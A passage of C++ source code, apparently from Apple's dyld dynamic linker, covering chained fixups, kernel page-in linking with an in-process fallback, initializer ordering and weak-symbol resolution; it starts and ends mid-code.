48)) != 0); + uint16_t diversity = (uint16_t)((value >> 32) & 0xFFFF); + if ( isBind ) { + uint32_t bindOrdinal = value & 0x00FFFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + *chain = signPointer(bindsArray[bindOrdinal], chain, addrDiv, diversity, key); + } + } + else { + /* note: in auth rebases only have 32-bits, so target is always offset - never vmaddr */ + uint64_t target = (value & 0xFFFFFFFF) + blob->mwli_image_address; + *chain = signPointer(target, chain, addrDiv, diversity, key); + } + } + else { + if ( isBind ) { + uint32_t bindOrdinal = value & 0x00FFFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + uint64_t addend19 = (value >> 32) & 0x0007FFFF; + if ( addend19 & 0x40000 ) + addend19 |= 0xFFFFFFFFFFFC0000ULL; + *chain = bindsArray[bindOrdinal] + addend19; + } + } + else { + uint64_t target = (value & 0x7FFFFFFFFFFULL); + uint64_t high8 = (value << 13) & 0xFF00000000000000ULL; + *chain = target + targetAdjust + high8; + } + } + chain += delta; + } while ( delta != 0 ); +} +#endif // __has_feature(ptrauth_calls) + + +static void fixupPage(void* pageContent, uint64_t userlandAddress, const mwl_info_hdr* blob) +{ + // find seg info and page within segment + const dyld_chained_starts_in_segment* segInfo = nullptr; + uint32_t pageIndex = 0; + const dyld_chained_starts_in_image* startsInfo = (dyld_chained_starts_in_image*)((uint8_t*)blob + blob->mwli_chains_offset); + for (uint32_t segIndex=0; segIndex < startsInfo->seg_count; ++segIndex) { + const dyld_chained_starts_in_segment* seg = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + startsInfo->seg_info_offset[segIndex]); + uint64_t segStartAddress = (blob->mwli_image_address + seg->segment_offset); + uint64_t segEndAddress = segStartAddress + seg->page_count * seg->page_size; + if ( (segStartAddress <= userlandAddress) && (userlandAddress < segEndAddress) ) { + segInfo = seg; + pageIndex = (uint32_t)((userlandAddress-segStartAddress)/(seg->page_size)); + break; + } + } + //fprintf(stderr, "fixupPage(%p), blob=%p, pageIndex=%d, segInfo=%p\n", pageContent, blob, pageIndex, segInfo); + assert(segInfo != nullptr); + + switch (blob->mwli_pointer_format) { +#if __has_feature(ptrauth_calls) + case DYLD_CHAINED_PTR_ARM64E: + fixupPageAuth64(pageContent, blob, segInfo, pageIndex, false); + break; + case DYLD_CHAINED_PTR_ARM64E_USERLAND: + case DYLD_CHAINED_PTR_ARM64E_USERLAND24: + fixupPageAuth64(pageContent, blob, segInfo, pageIndex, true); + break; +#endif + case DYLD_CHAINED_PTR_64: + fixupPage64(pageContent, blob, segInfo, pageIndex, false); + break; + case DYLD_CHAINED_PTR_64_OFFSET: + fixupPage64(pageContent, blob, segInfo, pageIndex, true); + break; + case DYLD_CHAINED_PTR_32: + fixupPage32(pageContent, blob, segInfo, pageIndex); + break; + } +} + +// implement __map_with_linking_np() in userland +static int dyld_map_with_linking_np(const mwl_region regions[], uint32_t regionCount, const mwl_info_hdr* blob, uint32_t blobSize) +{ + // sanity check + if ( blob->mwli_version != 7 ) + return -1; + uint32_t pointerSize = (blob->mwli_pointer_format == DYLD_CHAINED_PTR_32) ? 4 : 8; + if ( (blob->mwli_binds_offset + pointerSize*blob->mwli_binds_count) > blobSize ) { + fprintf(stderr, "bind table extends past blob, blobSize=%d, offset=%d, count=%d\n", blobSize, blob->mwli_binds_offset, blob->mwli_binds_count); + return -1; + } + if ( (blob->mwli_chains_offset + blob->mwli_chains_size) > blobSize ) + return -1; + + // apply fixups to each page in each page + const dyld_chained_starts_in_image* startsInfo = (dyld_chained_starts_in_image*)((uint8_t*)blob + blob->mwli_chains_offset); + //fprintf(stderr, "dyld_map_with_linking_np(), startsInfo=%p, seg_count=%d\n", startsInfo, startsInfo->seg_count); + for (uint32_t s=0; s < startsInfo->seg_count; ++s) { + if ( uint32_t segOffset = startsInfo->seg_info_offset[s] ) { + const dyld_chained_starts_in_segment* segInfo = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + segOffset); + uint8_t* segStartAddress = (uint8_t*)(blob->mwli_image_address + segInfo->segment_offset); + //fprintf(stderr, "dyld_map_with_linking_np(), segStartAddress=%p, page_count=%d\n", segStartAddress, segInfo->page_count); + for (uint32_t i=0; i < segInfo->page_count; ++i) { + void* content = (void*)(uintptr_t)(segStartAddress + i*blob->mwli_page_size); + fixupPage(content, (uintptr_t)content, blob); + } + } + } + return 0; +} + +struct PageInLinkingRange { mwl_region region; const char* segName; const dyld_chained_starts_in_segment* chainInfo; }; + +// Note: disable tail call optimization, otherwise tailcall may remove stack allocated blob +[[clang::disable_tail_calls]] static +int setUpPageInLinkingRegions(RuntimeState& state, const Loader* ldr, uintptr_t slide, uint16_t pointer_format, uint16_t pageSize, + bool forceDyldBinding, const Array& ranges, const Array& bindTargets) +{ + // create blob on the stack + uint32_t chainInfoSize = (uint32_t)offsetof(dyld_chained_starts_in_image, seg_info_offset[ranges.count()]); + for (const PageInLinkingRange& range : ranges) { + chainInfoSize += range.chainInfo->size; + chainInfoSize = (chainInfoSize + 3) & (-4); // size should always be 4-byte aligned + } + uint32_t pointerSize = (pointer_format == DYLD_CHAINED_PTR_32) ? 4 : 8; + uint32_t bindsOffset = (sizeof(mwl_info_hdr) + chainInfoSize + 7) & (-8); // 8-byte align + size_t blobAllocationSize = bindsOffset + pointerSize*bindTargets.count(); + uint8_t buffer[blobAllocationSize]; + bzero(buffer,blobAllocationSize); + mwl_info_hdr* blob = (mwl_info_hdr*)buffer; + blob->mwli_version = 7; + blob->mwli_page_size = pageSize; + blob->mwli_pointer_format = pointer_format; + blob->mwli_binds_offset = bindsOffset; + blob->mwli_binds_count = (uint32_t)bindTargets.count(); + blob->mwli_chains_offset = sizeof(mwl_info_hdr); + blob->mwli_chains_size = chainInfoSize; + blob->mwli_slide = slide; + blob->mwli_image_address = (uintptr_t)ldr->loadAddress(state); + ::memcpy(&buffer[blob->mwli_binds_offset], bindTargets.begin(), pointerSize * blob->mwli_binds_count); + uint32_t offsetInChainInfo = (uint32_t)offsetof(dyld_chained_starts_in_image, seg_info_offset[ranges.count()]); + uint32_t rangeIndex = 0; + dyld_chained_starts_in_image* starts = (dyld_chained_starts_in_image*)((uint8_t*)blob + blob->mwli_chains_offset); + starts->seg_count = (uint32_t)ranges.count(); + for (const PageInLinkingRange& range : ranges) { + starts->seg_info_offset[rangeIndex] = offsetInChainInfo; + ::memcpy(&buffer[blob->mwli_chains_offset + offsetInChainInfo], range.chainInfo, range.chainInfo->size); + ++rangeIndex; + offsetInChainInfo += range.chainInfo->size; + } + STACK_ALLOC_ARRAY(mwl_region, regions, ranges.count()); + for (const PageInLinkingRange& range : ranges) { + regions.push_back(range.region); + } + + int result = 0; + if ( forceDyldBinding ) { + result = dyld_map_with_linking_np(regions.begin(), (uint32_t)regions.count(), blob, (uint32_t)blobAllocationSize); + } + else { + if ( state.config.log.fixups || state.config.log.segments ) { + state.log("Setting up kernel page-in linking for %s\n", ldr->path()); + for (const PageInLinkingRange& range : ranges) { + state.log("%14s (%c%c%c) 0x%012llX->0x%012llX (fileOffset=0x%0llX, size=%lluKB)\n", range.segName, + ((range.region.mwlr_protections & 1) ? 'r' : '.'), ((range.region.mwlr_protections & 2) ? 'w' : '.'), ((range.region.mwlr_protections & 4) ? 'x' : '.'), + range.region.mwlr_address, range.region.mwlr_address + range.region.mwlr_size, range.region.mwlr_file_offset, range.region.mwlr_size/1024); + } + } +#if BUILDING_DYLD + result = __map_with_linking_np(regions.begin(), (uint32_t)regions.count(), blob, (uint32_t)blobAllocationSize); + if ( result != 0 ) { + // kernel backed page-in linking failed, manually do fixups in-process + if ( state.config.log.fixups || state.config.log.segments ) + state.log("__map_with_linking_np(%s) failed, falling back to linking in-process\n", ldr->path()); + result = dyld_map_with_linking_np(regions.begin(), (uint32_t)regions.count(), blob, (uint32_t)blobAllocationSize); + } +#endif + } + return result; +} + + +void Loader::setUpPageInLinking(Diagnostics& diag, RuntimeState& state, uintptr_t slide, uint64_t sliceOffset, const Array& bindTargets) const +{ + int fd = state.config.syscall.open(this->path(), O_RDONLY, 0); + if ( fd == -1 ) { + diag.error("open(\"%s\", O_RDONLY) failed with errno=%d", this->path(), errno); + return; + } + // don't use page-in linking after libSystem is initialized + // don't use page-in linking if process has a sandbox that disables syscall + bool canUsePageInLinkingSyscall = (state.config.process.pageInLinkingMode >= 2) && (state.libSystemHelpers == nullptr) && !state.config.syscall.sandboxBlockedPageInLinking(); + const MachOAnalyzer* ma = (MachOAnalyzer*)this->loadAddress(state); + const bool enableTpro = state.config.process.enableTproDataConst; + __block uint16_t format = 0; + __block uint16_t pageSize = 0; + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(PageInLinkingRange, kernelPageInRegionInfo, 8); + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(PageInLinkingRange, dyldPageInRegionInfo, 8); + ma->withChainStarts(diag, ma->chainStartsOffset(), ^(const dyld_chained_starts_in_image* startsInfo) { + // build mwl_region array and compute page starts size + __block const dyld_chained_starts_in_segment* lastSegChainInfo = nullptr; + ma->forEachSegment(^(const MachOAnalyzer::SegmentInfo& segInfo, bool& stop) { + if ( segInfo.segIndex < startsInfo->seg_count ) { + if ( startsInfo->seg_info_offset[segInfo.segIndex] == 0 ) { + return; + } + const dyld_chained_starts_in_segment* segChainInfo = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + startsInfo->seg_info_offset[segInfo.segIndex]); + if ( format == 0 ) { + format = segChainInfo->pointer_format; + } + else if ( format != segChainInfo->pointer_format ) { + diag.error("pointer_format is different in different segments"); + stop = true; + } + if ( pageSize == 0 ) { + pageSize = segChainInfo->page_size; + } + else if ( pageSize != segChainInfo->page_size ) { + diag.error("page_size is different in different segments"); + stop = true; + } + PageInLinkingRange rangeInfo; + rangeInfo.region.mwlr_fd = fd; + rangeInfo.region.mwlr_protections = segInfo.protections; // Note: DATA_CONST is r/w at this point, so objc can do its fixups + rangeInfo.region.mwlr_file_offset = segInfo.fileOffset + sliceOffset; + rangeInfo.region.mwlr_address = segInfo.vmAddr + slide; + rangeInfo.region.mwlr_size = pageSize * segChainInfo->page_count; // in case some pages don't have fixups, don't use segment size + rangeInfo.segName = segInfo.segName; + rangeInfo.chainInfo = segChainInfo; + if ( canUsePageInLinkingSyscall ) { + // this is where we tune which fixups are done by the kernel + // currently only single page DATA segments are done by dyld + // the kernel only supports 5 regions per syscall, so any segments past that are fixed up by dyld + if ( (segInfo.readOnlyData || (segChainInfo->page_count > 1)) && (kernelPageInRegionInfo.count() < MWL_MAX_REGION_COUNT) ) { + if (enableTpro && segInfo.readOnlyData) { + rangeInfo.region.mwlr_protections |= VM_PROT_TPRO; + } + kernelPageInRegionInfo.push_back(rangeInfo); + } + else + dyldPageInRegionInfo.push_back(rangeInfo); + } + else { + dyldPageInRegionInfo.push_back(rangeInfo); + } + lastSegChainInfo = segChainInfo; + } + }); + // image has not DATA pages to page-in link, so do nothing + if ( lastSegChainInfo == nullptr ) + return; + + if ( !kernelPageInRegionInfo.empty() ) { + int kernResult = setUpPageInLinkingRegions(state, this, slide, format, pageSize, (state.config.process.pageInLinkingMode == 1), kernelPageInRegionInfo, bindTargets); + // if kernel can't do page in linking, then have dyld do the fixups + if ( kernResult != 0 ) + setUpPageInLinkingRegions(state, this, slide, format, pageSize, true, kernelPageInRegionInfo, bindTargets); + } + if ( !dyldPageInRegionInfo.empty() ) + setUpPageInLinkingRegions(state, this, slide, format, pageSize, true, dyldPageInRegionInfo, bindTargets); + }); + + state.config.syscall.close(fd); +} +#endif // !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + +void Loader::applyFixupsGeneric(Diagnostics& diag, RuntimeState& state, uint64_t sliceOffset, const Array& bindTargets, + const Array& overrideBindTargets, bool laziesMustBind, + const Array& missingFlatLazySymbols) const +{ + const MachOAnalyzer* ma = (MachOAnalyzer*)this->loadAddress(state); + const uintptr_t slide = ma->getSlide(); + if ( ma->hasChainedFixups() ) { + bool applyFixupsNow = true; +#if !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + // only do page in linking, if binary has standard chained fixups, config allows, and not so many targets that is wastes wired memory + if ( (state.config.process.pageInLinkingMode != 0) && ma->hasChainedFixupsLoadCommand() && (bindTargets.count() < 10000) ) { + this->setUpPageInLinking(diag, state, slide, sliceOffset, bindTargets); + // if we cannot do page-in-linking, then do fixups now + applyFixupsNow = diag.hasError(); + diag.clearError(); + } +#endif // !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + if ( applyFixupsNow ) { + // walk all chains + ma->withChainStarts(diag, ma->chainStartsOffset(), ^(const dyld_chained_starts_in_image* startsInfo) { + ma->fixupAllChainedFixups(diag, startsInfo, slide, bindTargets, ^(void* loc, void* newValue) { + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX\n", (uintptr_t)loc, (uintptr_t)newValue); + *((uintptr_t*)loc) = (uintptr_t)newValue; + }); + }); + } + } + else if ( ma->hasOpcodeFixups() ) { + // process all rebase opcodes + ma->forEachRebaseLocation_Opcodes(diag, ^(uint64_t runtimeOffset, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t locValue = *loc; + uintptr_t newValue = locValue + slide; + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX \n", (uintptr_t)loc, (uintptr_t)newValue); + *loc = newValue; + }); + if ( diag.hasError() ) + return; + + // process all bind opcodes + ma->forEachBindLocation_Opcodes(diag, ^(uint64_t runtimeOffset, unsigned targetIndex, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t newValue = (uintptr_t)(bindTargets[targetIndex]); + + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX <%s/bind#%u>\n", (uintptr_t)loc, (uintptr_t)newValue, this->leafName(), targetIndex); + *loc = newValue; + +#if !TARGET_OS_EXCLAVEKIT + // Record missing lazy symbols + if ( newValue == (uintptr_t)state.libdyldMissingSymbol ) { + for (const MissingFlatLazySymbol& missingSymbol : missingFlatLazySymbols) { + if ( missingSymbol.bindTargetIndex == targetIndex ) { + state.addMissingFlatLazySymbol(this, missingSymbol.symbolName, loc); + break; + } + } + } +#endif // !TARGET_OS_EXCLAVEKIT + }, ^(uint64_t runtimeOffset, unsigned overrideBindTargetIndex, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t newValue = (uintptr_t)(overrideBindTargets[overrideBindTargetIndex]); + + // Skip missing weak binds + if ( newValue == UINTPTR_MAX ) { + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX (skipping missing weak bind) <%s/weak-bind#%u>\n", (uintptr_t)loc, this->leafName(), overrideBindTargetIndex); + return; + } + + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX <%s/weak-bind#%u>\n", (uintptr_t)loc, (uintptr_t)newValue, this->leafName(), overrideBindTargetIndex); + *loc = newValue; + }); + } +#if SUPPORT_CLASSIC_RELOCS + else { + // process internal relocations + ma->forEachRebaseLocation_Relocations(diag, ^(uint64_t runtimeOffset, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t locValue = *loc; + uintptr_t newValue = locValue + slide; + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX \n", (uintptr_t)loc, (uintptr_t)newValue); + *loc = newValue; + }); + if ( diag.hasError() ) + return; + + // process external relocations + ma->forEachBindLocation_Relocations(diag, ^(uint64_t runtimeOffset, unsigned targetIndex, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t newValue = (uintptr_t)(bindTargets[targetIndex]); + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX <%s/bind#%u>\n", (uintptr_t)loc, (uintptr_t)newValue, this->leafName(), targetIndex); + *loc = newValue; + }); + } +#endif // SUPPORT_CLASSIC_RELOCS +} + +void Loader::findAndRunAllInitializers(RuntimeState& state) const +{ + Diagnostics diag; + const MachOAnalyzer* ma = this->analyzer(state); + dyld3::MachOAnalyzer::VMAddrConverter vmAddrConverter = ma->makeVMAddrConverter(true); + state.memoryManager.withReadOnlyMemory([&]{ + ma->forEachInitializer(diag, vmAddrConverter, ^(uint32_t offset) { + void *func = (void *)((uint8_t*)ma + offset); + if ( state.config.log.initializers ) + state.log("running initializer %p in %s\n", func, this->path()); +#if __has_feature(ptrauth_calls) + func = __builtin_ptrauth_sign_unauthenticated(func, ptrauth_key_asia, 0); +#endif + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_STATIC_INITIALIZER, (uint64_t)ma, (uint64_t)func, 0); + ((Initializer)func)(state.config.process.argc, state.config.process.argv, state.config.process.envp, state.config.process.apple, state.vars); + }); + }); + +#if !TARGET_OS_EXCLAVEKIT + // don't support static terminators in arm64e binaries + if ( ma->isArch("arm64e") ) + return; + // register static terminators in old binaries, if any + typedef void (*Terminator)(void*); + ma->forEachTerminator(diag, vmAddrConverter, ^(uint32_t offset) { + Terminator func = (Terminator)((uint8_t*)ma + offset); + state.libSystemHelpers->__cxa_atexit(func, nullptr, (void*)ma); + if ( state.config.log.initializers ) + state.log("registering old style destructor %p for %s\n", func, this->path()); + }); +#endif // !TARGET_OS_EXCLAVEKIT +} + +void Loader::runInitializersBottomUp(RuntimeState& state, Array& danglingUpwards) const +{ + // do nothing if already initializers already run + if ( (const_cast(this))->beginInitializers(state) ) + return; + + //state.log("runInitializersBottomUp(%s)\n", this->path()); + + // make sure everything below this image is initialized before running my initializers + const uint32_t depCount = this->dependentCount(); + for ( uint32_t i = 0; i < depCount; ++i ) { + DependentKind childKind; + if ( Loader* child = this->dependent(state, i, &childKind) ) { + if ( childKind == DependentKind::upward ) { + // add upwards to list to process later + if ( !danglingUpwards.contains(child) ) + danglingUpwards.push_back(child); + } + else { + child->runInitializersBottomUp(state, danglingUpwards); + } + } + } + + // tell objc to run any +load methods in this image (done before C++ initializers) + state.notifyObjCInit(this); + + // run initializers for this image + this->runInitializers(state); +} + +void Loader::runInitializersBottomUpPlusUpwardLinks(RuntimeState& state) const +{ + //state.log("runInitializersBottomUpPlusUpwardLinks() %s\n", this->path()); + state.memoryManager.withWritableMemory([&]{ + // recursively run all initializers + STACK_ALLOC_ARRAY(const Loader*, danglingUpwards, state.loaded.size()); + this->runInitializersBottomUp(state, danglingUpwards); + + //state.log("runInitializersBottomUpPlusUpwardLinks(%s), found %d dangling upwards\n", this->path(), danglingUpwards.count()); + + // go back over all images that were upward linked, and recheck they were initialized (might be danglers) + STACK_ALLOC_ARRAY(const Loader*, extraDanglingUpwards, state.loaded.size()); + for ( const Loader* ldr : danglingUpwards ) { + //state.log("running initializers for dangling upward link %s\n", ldr->path()); + ldr->runInitializersBottomUp(state, extraDanglingUpwards); + } + if ( !extraDanglingUpwards.empty() ) { + // in case of double upward dangling images, check initializers again + danglingUpwards.resize(0); + for ( const Loader* ldr : extraDanglingUpwards ) { + //state.log("running initializers for dangling upward link %s\n", ldr->path()); + ldr->runInitializersBottomUp(state, danglingUpwards); + } + } + }); +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +// Used to build prebound targets in PrebuiltLoader. +void Loader::forEachBindTarget(Diagnostics& diag, RuntimeState& state, CacheWeakDefOverride cacheWeakDefFixup, bool allowLazyBinds, + void (^callback)(const ResolvedSymbol& target, bool& stop), + void (^overrideBindCallback)(const ResolvedSymbol& target, bool& stop)) const +{ + this->withLayout(diag, state, ^(const mach_o::Layout &layout) { + mach_o::Fixups fixups(layout); + + __block unsigned targetIndex = 0; + __block unsigned overrideBindTargetIndex = 0; +#if SUPPORT_PRIVATE_EXTERNS_WORKAROUND + intptr_t slide = this->analyzer(state)->getSlide(); +#else + intptr_t slide = 0; +#endif + fixups.forEachBindTarget(diag, allowLazyBinds, slide, ^(const mach_o::Fixups::BindTargetInfo& info, bool& stop) { + // Regular and lazy binds + assert(targetIndex == info.targetIndex); + ResolvedSymbol targetInfo = this->resolveSymbol(diag, state, info.libOrdinal, info.symbolName, info.weakImport, info.lazyBind, cacheWeakDefFixup); + targetInfo.targetRuntimeOffset += info.addend; + callback(targetInfo, stop); + if ( diag.hasError() ) + stop = true; + ++targetIndex; + }, ^(const mach_o::Fixups::BindTargetInfo& info, bool& stop) { + // Opcode based weak binds + assert(overrideBindTargetIndex == info.targetIndex); + Diagnostics weakBindDiag; // failures aren't fatal here + ResolvedSymbol targetInfo = this->resolveSymbol(weakBindDiag, state, info.libOrdinal, info.symbolName, info.weakImport, info.lazyBind, cacheWeakDefFixup); + if ( weakBindDiag.hasError() ) { + // In dyld2, it was also ok for a weak bind to be missing. Then we would let the bind/rebase on this + // address handle it + targetInfo.targetLoader = nullptr; + targetInfo.targetRuntimeOffset = 0; + targetInfo.kind = ResolvedSymbol::Kind::bindToImage; + targetInfo.isCode = false; + targetInfo.isWeakDef = false; + targetInfo.isMissingFlatLazy = false; + } else { + targetInfo.targetRuntimeOffset += info.addend; + } + overrideBindCallback(targetInfo, stop); + ++overrideBindTargetIndex; + }); + }); +} + +bool Loader::hasConstantSegmentsToProtect() const +{ + return this->hasReadOnlyData && !this->dylibInDyldCache; +} + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +void Loader::makeSegmentsReadOnly(RuntimeState& state) const +{ + const MachOAnalyzer* ma = this->analyzer(state); + uintptr_t slide = ma->getSlide(); + ma->forEachSegment(^(const MachOAnalyzer::SegmentInfo& segInfo, bool& stop) { + if ( segInfo.readOnlyData ) { + #if TARGET_OS_EXCLAVEKIT + //TODO: EXCLAVES + (void)slide; + #else + const uint8_t* start = (uint8_t*)(segInfo.vmAddr + slide); + size_t size = (size_t)segInfo.vmSize; + state.config.syscall.mprotect((void*)start, size, PROT_READ); + if ( state.config.log.segments ) + state.log("mprotect 0x%012lX->0x%012lX to read-only\n", (long)start, (long)start + size); + #endif + } + }); +} + +void Loader::makeSegmentsReadWrite(RuntimeState& state) const +{ + const MachOAnalyzer* ma = this->analyzer(state); + uintptr_t slide = ma->getSlide(); + ma->forEachSegment(^(const MachOAnalyzer::SegmentInfo& segInfo, bool& stop) { + if ( segInfo.readOnlyData ) { + #if TARGET_OS_EXCLAVEKIT + //TODO: EXCLAVES + (void)slide; + #else + const uint8_t* start = (uint8_t*)(segInfo.vmAddr + slide); + size_t size = (size_t)segInfo.vmSize; + state.config.syscall.mprotect((void*)start, size, PROT_READ | PROT_WRITE); + if ( state.config.log.segments ) + state.log("mprotect 0x%012lX->0x%012lX to read-write\n", (long)start, (long)start + size); + #endif + } + }); +} + +void Loader::logSegmentsFromSharedCache(RuntimeState& state) const +{ + state.log("Using mapping in dyld cache for %s\n", this->path()); + uint64_t cacheSlide = state.config.dyldCache.slide; + this->loadAddress(state)->forEachSegment(^(const MachOLoaded::SegmentInfo& info, bool& stop) { + state.log("%14s (%c%c%c) 0x%012llX->0x%012llX \n", info.segName, + (info.readable() ? 'r' : '.'), (info.writable() ? 'w' : '.'), (info.executable() ? 'x' : '.'), + info.vmAddr + cacheSlide, info.vmAddr + cacheSlide + info.vmSize); + }); +} + +// FIXME: This only handles weak-defs and does not look for non-weaks that override weak-defs +void Loader::addWeakDefsToMap(RuntimeState& state, const std::span& newLoaders) +{ + for (const Loader* ldr : newLoaders) { + const MachOAnalyzer* ma = ldr->analyzer(state); + if ( (ma->flags & MH_WEAK_DEFINES) == 0 ) + continue; + if ( ldr->hiddenFromFlat() ) + continue; + + // NOTE: using the nlist is faster to scan for weak-def exports, than iterating the exports trie + Diagnostics diag; + uint64_t baseAddress = ma->preferredLoadAddress(); + ma->forEachGlobalSymbol(diag, ^(const char* symbolName, uint64_t n_value, uint8_t n_type, uint8_t n_sect, uint16_t n_desc, bool& stop) { + if ( (n_desc & N_WEAK_DEF) != 0 ) { + // only add if not already in map + const auto& pos = state.weakDefMap->find(symbolName); + if ( pos == state.weakDefMap->end() ) { + WeakDefMapValue mapEntry; + mapEntry.targetLoader = ldr; + mapEntry.targetRuntimeOffset = n_value - baseAddress; + mapEntry.isCode = false; // unused + mapEntry.isWeakDef = true; + state.weakDefMap->operator[](symbolName) = mapEntry; + } + } + }); + } +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +Loader::ResolvedSymbol Loader::resolveSymbol(Diagnostics& diag, RuntimeState& state, int libOrdinal, const char* symbolName, + bool weakImport, bool lazyBind, CacheWeakDefOverride patcher, bool buildingCache) const +{ + __block ResolvedSymbol result = { nullptr, symbolName, 0, ResolvedSymbol::Kind::bindAbsolute, false, false }; + if ( (libOrdinal > 0) && ((unsigned)libOrdinal <= this->dependentCount()) ) { + result.targetLoader = dependent(state, libOrdinal - 1); + } + else if ( libOrdinal == BIND_SPECIAL_DYLIB_SELF ) { + result.targetLoader = this; + } + else if ( libOrdinal == BIND_SPECIAL_DYLIB_MAIN_EXECUTABLE ) { + result.targetLoader = state.mainExecutableLoader; + } + else if ( libOrdinal == BIND_SPECIAL_DYLIB_FLAT_LOOKUP ) { + __block bool found = false; + state.locks.withLoadersReadLock(^{ + for ( const Loader* ldr : state.loaded ) { + // flat lookup can look in self, even if hidden + if ( ldr->hiddenFromFlat() && (ldr != this) ) + continue; + if ( ldr->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &result) ) { + found = true; + return; + } + } + }); + if ( found ) { + // record the dynamic dependency so the symbol we found does not get unloaded from under us + if ( result.targetLoader != this ) + state.addDynamicReference(this, result.targetLoader); + } + else { + if ( weakImport ) { + // ok to be missing, bind to NULL + result.kind = ResolvedSymbol::Kind::bindAbsolute; + result.targetRuntimeOffset = 0; + } + else if ( lazyBind && (state.libdyldMissingSymbolRuntimeOffset != 0) ) { + // lazy bound symbols can be bound to __dyld_missing_symbol_abort + result.targetLoader = state.libdyldLoader; + result.targetSymbolName = symbolName; + result.targetRuntimeOffset = (uintptr_t)state.libdyldMissingSymbolRuntimeOffset; + result.kind = ResolvedSymbol::Kind::bindToImage; + result.isCode = false; // only used for arm64e which uses trie not nlist + result.isWeakDef = false; + result.isMissingFlatLazy = true; + } + else { + // missing symbol, but not weak-import or lazy-bound, so error + diag.error("symbol not found in flat namespace '%s'", symbolName); + } + } + return result; + } + else if ( libOrdinal == BIND_SPECIAL_DYLIB_WEAK_LOOKUP ) { + const bool verboseWeak = false; + __block bool foundFirst = false; +#if BUILDING_CACHE_BUILDER + if ( buildingCache ) { + // when dylibs in cache are build, we don't have real load order, so do weak binding differently + if ( verboseWeak ) + state.log("looking for weak-def symbol %s\n", symbolName); + + // look first in /usr/lib/libc++, most will be here + for ( const Loader* ldr : state.loaded ) { + ResolvedSymbol libcppResult; + if ( ldr->mf(state)->hasWeakDefs() && (strncmp(ldr->path(), "/usr/lib/libc++.", 16) == 0) ) { + if ( ldr->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &libcppResult) ) { + if ( verboseWeak ) + state.log(" using %s from libc++.dylib\n", symbolName); + return libcppResult; + } + } + } + + // if not found, try looking in the images itself, most custom weak-def symbols have a copy in the image itself + ResolvedSymbol selfResult; + if ( this->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &selfResult) ) { + if ( verboseWeak ) + state.log(" using %s from self %s\n", symbolName, this->path()); + return selfResult; + } + + // if this image directly links with something that also defines this weak-def, use that because we know it will be loaded + const uint32_t depCount = this->dependentCount(); + for ( uint32_t i = 0; i < depCount; ++i ) { + Loader::DependentKind depKind; + if ( Loader* depLoader = this->dependent(state, i, &depKind) ) { + if ( depKind != Loader::DependentKind::upward ) { + ResolvedSymbol depResult; + if ( depLoader->hasExportedSymbol(diag, state, symbolName, Loader::staticLink, &depResult) ) { + if ( verboseWeak ) + state.log(" using %s from dependent %s\n", symbolName, depLoader->path()); + return depResult; + } + } + } + } + + // no impl?? + diag.error("weak-def symbol (%s) not found in dyld cache", symbolName); + return result; + } + else // fall into app launch case +#endif + state.locks.withLoadersReadLock(^{ + if ( verboseWeak ) + state.log("looking for weak-def symbol %s\n", symbolName); + state.weakDefResolveSymbolCount++; + // 5000 is a guess that "this is a large C++ app" and could use a map to speed up coalescing + if ( (state.weakDefResolveSymbolCount > 5000) && (state.weakDefMap == nullptr) ) { + state.weakDefMap = new (state.persistentAllocator.malloc(sizeof(WeakDefMap))) WeakDefMap(); + } + if ( state.weakDefMap != nullptr ) { + const auto& pos = state.weakDefMap->find(symbolName); + if ( (pos != state.weakDefMap->end()) && (pos->second.targetLoader != nullptr) ) { + //state.log("resolveSymbol(%s) found in map\n", symbolName); + result.targetLoader = pos->second.targetLoader; + result.targetSymbolName = symbolName; + result.targetRuntimeOffset = pos->second.targetRuntimeOffset; + result.kind = ResolvedSymbol::Kind::bindToImage; + result.isCode = pos->second.isCode; + result.isWeakDef = pos->second.isWeakDef; + result.isMissingFlatLazy = false; + if ( verboseWeak ) + state.log(" found %s in map, using impl from %s\n", symbolName, result.targetLoader->path()); + foundFirst = true; + return; + } + } + + // Keep track of results from the cache to be processed at the end, once + // we've chosen a canonical definition + struct CacheLookupResult { + const Loader* targetLoader = nullptr; + uint64_t targetRuntimeOffset = 0; + }; + STACK_ALLOC_ARRAY(CacheLookupResult, cacheResults, state.loaded.size()); + + bool weakBindOpcodeClient = !this->dylibInDyldCache && this->mf(state)->hasOpcodeFixups(); + for ( const Loader* ldr : state.loaded ) { + if ( ldr->mf(state)->hasWeakDefs() ) { + ResolvedSymbol thisResult; + // weak coalescing ignores hidden images + 